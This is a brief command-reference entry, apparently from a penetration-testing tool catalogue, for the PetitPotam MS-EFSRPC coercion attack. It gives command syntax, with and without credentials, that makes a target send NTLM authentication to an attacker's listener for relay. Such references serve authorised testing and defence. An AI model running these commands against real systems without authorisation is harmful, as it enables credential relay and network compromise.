PetitPotam Coercion

Coerce NTLM authentication from a target using MS-EFSRPC (PetitPotam)

Tool
python3
Category
Credential Attacks / NTLM Relay & Coercion
Platform
linux
Requires
no credentials
Protocols
RPC, NTLM

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

python3 PetitPotam.py <listener_ip> <target_ip>

Credential variants

The same attack using a different authentication material.

With Credentials requires password

python3 PetitPotam.py -u '<user>' -p '<password>' -d '<domain>' <listener_ip> <target_ip>

Examples

python3 PetitPotam.py 192.168.1.50 192.168.1.100
python3 PetitPotam.py -u 'user' -p 'password' -d 'corp.local' 192.168.1.50 192.168.1.100

Tags

petitpotam coercion efsrpc ntlm relay